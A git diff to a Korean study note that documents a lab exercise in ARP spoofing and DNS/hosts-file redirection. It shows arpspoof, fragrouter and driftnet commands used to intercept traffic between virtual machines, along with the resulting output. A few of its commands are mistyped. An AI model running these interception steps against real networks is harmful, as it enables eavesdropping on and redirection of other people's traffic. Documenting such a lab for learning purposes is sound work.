--- a/NetWork/스푸핑.md
+++ b/NetWork/스푸핑.md
@@ -69,7 +69,7 @@ G/W             (192.168.10.2)   / 00:0c:29:b2:04:58
 ## 결론
 - 공격을 하고 있는 동안만 MAC Address가 변경된다.
 
-## 실습 2. 응용 실습 (도메인을 이용한 공격)
+## 실습 2. 응용 실습 1.  (도메인을 이용한 공격)
 
 ### 개요
 - CentOS에서 DNS서버와 Web 서버를 구축한다.
@@ -99,6 +99,34 @@ G/W             (192.168.10.2)   / 00:0c:29:b2:04:58
 ### Step 5. 'kali'에서 시스템 재구성
 
 - Apache2 패키지 설치, 방화벽 추가 후 활성화
+<br>
+```
+[samadal@kali ~]$ sudo apt install apache2
+apache2 is already the newest version (2.4.63-1).
+apache2 set to manually installed.
+Summary:
+  Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 1167
+  
+
+[samadal@kali ~]$ dpkg -l | grep apache2
+ii  apache2                                 2.4.63-1                                 amd64        Apache HTTP Server
+ii  apache2-bin                             2.4.63-1                                 amd64        Apache HTTP Server (modules and other binary files)
+ii  apache2-data                            2.4.63-1                                 all          Apache HTTP Server (common files)
+ii  apache2-utils                           2.4.63-1                                 amd64        Apache HTTP Server (utility programs for web servers)
+ii  libapache2-mod-dnssd                    0.6-5                                    amd64        Zeroconf support for Apache 2 via avahi
+ii  libapache2-mod-php                      2:8.4+96                                 all          server-side, HTML-embedded scripting language (Apache 2 module) (default)
+ii  libapache2-mod-php8.4                   8.4.4-1
+```
+```
+- 데몬 재실행
+    
+    → sudo service apache2 restart
+    
+- 방화벽 확인
+    
+    → sudo ufw status
+```
+
 - 사이트 출력 <br>
 ![후](./img/스푸핑img/5.png)
 
@@ -128,3 +156,170 @@ sudo arpspoof -i eth0 -t 192.168.10.132 192.168.10.2
 이는 일반적으로 ARP 스푸핑(위조) 또는 ARP 포이즈닝 공격의 징후입니다.
 ```
 변화
+
+```bash
+[samadal@kali ~]$ sudo cat /etc/hosts
+127.0.0.1       localhost
+127.0.1.1       kali
+
+# The following lines are desirable for IPv6 capable hosts
+::1     localhost ip6-localhost ip6-loopback
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+
+[samadal@kali ~]$
+
+[samadal@kali ~]$ sudo cp -p /etc/hosts /etc/host.samadal
+```
+
+- /etc/hosts 파일 수정
+
+```bash
+[samadal@kali ~]$ sudo vi /etc/hosts
+
+[samadal@kali ~]$
+
+[samadal@kali ~]$ cat /etc/hosts
+127.0.0.1       localhost
+127.0.1.1       kali
+
+# The following lines are desirable for IPv6 capable hosts
+::1     localhost ip6-localhost ip6-loopback
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+
+192.168.0.27    www.naver.com   ->내 hostOS IP 입력 
+192.168.10.134  www.google.com
+```
+```
+sudo arpspoof -i eth0 -t 192.168.10.132 192.168.10.2
+```
+
+```
+[samadal@kali ~]$ sudo vi /etc/resolv.conf
+[sudo] password for samadal:
+
+[samadal@kali ~]$
+
+[samadal@kali ~]$ sudo apt -y install fragrouter
+```
+다시 resolve.conf 수정 후
+```
+[samadal@kali ~]$ sudo fragrouter -B1
+fragrouter: base-1: normal IP forwarding
+```
+<br>
+
+```
+192.168.0.27 naver.com
+192.168.10.134 google.com
+
+[samadal@kali ~]$ sudo fragrouter -B1
+fragrouter: base-1: normal IP forwarding
+192.168.10.130.63314 > 8.8.8.8.53: udp 28
+192.168.10.130.58844 > 8.8.8.8.53: udp 28
+
+
+192.168.0.1 naver.com
+192.168.10.134 google.com
+
+[samadal@kali ~]$ sudo fragrouter -B1
+fragrouter: base-1: normal IP forwarding
+192.168.10.130.64830 > 8.8.8.8.53: udp 28
+```
+아무 변화 없다 <br>
+
+--- 
+## 응용 실습 3. Packet Forwarding 2. GET
+
+### 🖥️ 실습 환경(NAT)
+```
+- Attacker(Kali)        192.168.10.134 / c / 192.168.10.2 / 192.168.10.2
+- 확인(Windows 10)       192.168.10.130 / c / 192.168.10.2 / 8.8.8.8
+``` 
+## Step 1. 'Packet Forwarding'을 위한 환경 구성
+> 호스트 변경<br>
+
+```
+(kali) vi /etc/hosts
+192.168.0.38 naver.com          -> Host OS의 IP주소
+192.168.10.134 google.com       -> kali의 IP주소
+```
+## Step 2. ARP Spoofing 명령 실행
+
+> 스푸핑을 때린다
+```
+[samadal@kali ~]$ sudo arpspoof -i eth0 -t 192.168.10.130 192.168.10.2
+0:c:29:b2:4:58 0:c:29:be:47:cb 0806 42: arp reply 192.168.10.2 is-at 0:c:29:b2:4:58
+```
+이 화면은 그대로 둔다.
+
+## Step 3. 'Packet Forwarding'명령 실행 (화면이 멈춘것처럼 되어 있어도 정상)
+
+> 신규 터미널창은 하나 더 열고 실행 <br>
+> 현재 window10 주소
+```
+C:\Users\Administrator>arp -a
+
+인터페이스: 192.168.10.130 --- 0x6
+  인터넷 주소           물리적 주소           유형
+  192.168.10.2          00-50-56-e0-28-a3     동적
+  192.168.10.255        ff-ff-ff-ff-ff-ff     정적
+  224.0.0.22            01-00-5e-00-00-16     정적
+  224.0.0.251           01-00-5e-00-00-fb     정적
+  224.0.0.252           01-00-5e-00-00-fc     정적
+```
+
+
+- window10 맥주소 변화<br>
+![변화](./img/스푸핑img/9.png)
+
+```
+[samadal@kali ~]$ sudo fragrouter -B1
+```
+맥주소 변화 없음
+
+## 결론
+### 공격대상에 ARP Spoofing을 실행한 후 **fragroute -B1** 를 통해 공격대상의 웹 브라우저에 출력되는 모든 내용을 공격대상의 가상 포트를 이용해서 확인이 가능하다.
+
+
+## 응용 실습 4. Packet Forwarding 3. POST
+
+### 🖥️ 실습 환경(NAT)
+```
+- Attacker(Kali)        192.168.10.134 / c / 192.168.10.2 / 192.168.10.132
+- Victim(CentOS)        192.168.10.132 / c / x / x
+- 확인(Windows 10)       192.168.10.130 / c / 192.168.10.2 / 192.168.10.132
+``` 
+![post](./img/스푸핑img/11.png)
+<br>
+![post](./img/스푸핑img/10.png)
+
+## 응용실습 5. 패킷 덤핑 및 가로채기
+### 🖥️ 실습 환경(NAT)
+```
+- Attacker(Kali)        192.168.10.134 / c / 192.168.10.2 / 192.168.10.2
+- 확인(Windows 10)       192.168.10.130 / c / 192.168.10.2 / 8.8.8.8
+``` 
+
+```
+[samadal@kali ~]$ sudo driftnet -i eth0
+
+(driftnet:5865): Gtk-WARNING **: 20:43:40.593: cannot open display:
+```
+
+Step 1. 'ARP Spoofing'을 이용한 공격대상 시스템의 'ARP 캐시 정보(G/W 주소)' 변경
+```
+(kali)$ sudo arpspoof -i eth0 -t 192.168.10.130 192.168.10.2
+```
+
+Step 2. 패킷 포워딩 설정
+```
+(kali)$ sudo fragrouter -B1
+```
+
+Step3. 펌프 및 가로 채기
+```
+(kali)$ sudo tcp dump src192.168.10.130 and prot 80 
+(kali)$ sudo driftnet -t eth0
+```
